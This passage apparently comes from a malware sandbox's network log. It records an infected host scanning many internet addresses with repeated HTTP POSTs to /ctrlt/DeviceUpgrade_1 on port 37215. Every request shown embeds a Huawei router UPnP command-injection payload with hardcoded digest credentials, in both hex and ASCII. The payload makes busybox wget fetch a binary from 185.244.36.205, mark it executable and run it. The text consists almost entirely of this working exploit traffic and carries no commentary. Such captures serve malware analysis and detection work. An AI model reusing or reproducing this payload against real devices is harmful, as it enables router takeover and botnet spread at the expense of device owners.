                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1174192.168.2.1550872181.139.37.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.952845097 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1175192.168.2.1537488157.216.141.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.953118086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1176192.168.2.155047637.87.6.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.953591108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1177192.168.2.1553706156.130.146.22337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.954058886 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1178192.168.2.1557168222.166.203.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.954396963 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1179192.168.2.154065894.251.12.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.954672098 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1180192.168.2.1550926156.225.58.21237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.955136061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1181192.168.2.1549084186.221.44.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.955183983 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1182192.168.2.1556896157.178.191.1537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.955775976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1183192.168.2.1542376181.116.253.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.956196070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1184192.168.2.1538526157.105.163.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.956407070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
